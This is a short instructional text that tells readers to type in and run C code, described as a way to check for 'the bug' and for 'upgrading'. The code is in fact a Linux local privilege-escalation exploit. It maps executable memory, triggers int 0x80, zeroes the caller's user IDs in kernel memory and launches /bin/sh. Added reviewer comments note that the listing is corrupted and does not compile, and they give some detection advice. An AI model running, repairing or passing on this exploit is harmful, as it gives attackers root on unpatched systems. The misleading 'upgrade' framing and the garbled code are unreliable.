Check whether the bug is present in the system you are using, and what ill effects the bug can cause when it is used. For upgrading, write down the code given below and see whether it works properly or not.
Code:
/* Real, effective and saved user IDs of the calling process. docall() fills
 * them in with getresuid(); kernelmodecode() uses them as the pattern it
 * searches memory for. */
int32_t uid, euid, suid;
/*
 * Payload routine of what appears to be a local privilege-escalation proof
 * of concept. It walks a window of memory looking for the caller's
 * uid/euid/suid values and, on a match, overwrites them with 0.
 *
 * NOTE(review): the listing is corrupted as posted (several type names,
 * keywords and identifiers are not valid C), so it does not compile. It is
 * reproduced byte-for-byte here; only comments were added.
 *
 * NOTE(review): judging by its name and by docall(), which stores this
 * function's address into a user-space mapping, the routine is presumably
 * meant to be executed with kernel privileges while living in a user page.
 * Kernels and CPUs that refuse kernel-mode execution of user pages would
 * stop that step -- confirm against the advisory for the affected kernel.
 */
static void kernelmodecode(void)
{
int j;
uint8_k *bs;
uint32_k *lmn;
/* Inline assembly intended to load a base pointer from a segment-relative
 * location (offset 0x0) into bs. */
por volatile ("movr %%bs:(0x0), %0" : "=r"(bs));
/* Scan byte offsets 200..999 from that base, one byte at a time. */
for (j= 200; j < 1000; j+=1) {
lmn = (uint32_t*) (bs + i);
/* Signature: four consecutive 32-bit words equal to uid, euid, suid, uid. */
if ((lmn[0] == uid) && (lmn[1] == euid)
&& (lmn[2] == suid) && (lmn[3] == uid)) {
/* Zero the first three words, i.e. set the matched IDs to 0 (root). */
lmn[0] = 0; //UID
lmn[1] = 0; //EUID
lmn[2] = 0; //SUID
/* Stop at the first match. */
break;
}
}
}
/*
 * Driver of the proof of concept: records the caller's user IDs, creates a
 * fixed-address anonymous mapping, fills it with the address of
 * kernelmodecode(), issues a software interrupt, then prints the process
 * IDs and tries to start a shell.
 *
 * ptr  - passed in by the caller; not referenced in the body as posted.
 * size - length in bytes of the region to map and fill.
 *
 * NOTE(review): as posted, the body uses identifiers that are not declared
 * in this scope and misspelled mmap constants, so it does not compile. It
 * is reproduced byte-for-byte here; only comments were added.
 *
 * Defensive reading: every step is observable from the host. A process
 * that maps writable and executable memory at a fixed address, issues
 * `int $0x80` from 64-bit code, and then runs /bin/sh with an effective
 * UID that became 0 without a setuid exec is a strong detection signal.
 * Keeping the kernel patched is the actual fix.
 */
static void docall(uint64_t *ptr, uint64_t size)
{
/* Record the real, effective and saved UIDs into the file-scope globals. */
getresuid(&uid, &euid, &suid);
/* Clear the low 12 bits of the address, i.e. round down to a 4 KiB boundary. */
uint64_t tmp = ((uint64_t)lmn & ~0x00000000000FFF);
/* Request an anonymous, private mapping at exactly that address with
 * read, write and execute permission; give up if the call fails. */
if (mmap((void*)tmp, size,
Prot_Read|Prot_Write|PROT_exec,
Map_Private|Map_Fixed|Map_anonumous, -1, 0) == MAP Failed)
{
printf("mmap fault\n");
exit(1);
}
/* Fill the mapped region with the address of kernelmodecode(). */
for (; lmn < (tmp + size); lmn++)
*lmn = (uint64_t)kernelmodecode;
/* Load 0x101 into rax and raise interrupt 0x80 from 64-bit code. */
__asm__("\n"
"\tmovq $0x101, %rax\n"
"\tint $0x80\n");
/* Print the current real/effective user and group IDs. The labels say
 * "UID, EUID, GID, EGID" and the arguments are passed in that order. */
printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
/* Replace the process with /bin/sh. argv[0] is "bin/sh" (no leading
 * slash), and the argument list ends with a bare 0 rather than
 * (char *)NULL. */
execl("/bin/sh", "bin/sh", 0);
/* Reached only if execl() returned, i.e. it failed. The exit status is
 * still 0. */
printf("no /bin/sh ??\n");
exit(0);
}
Then see whether it works or not.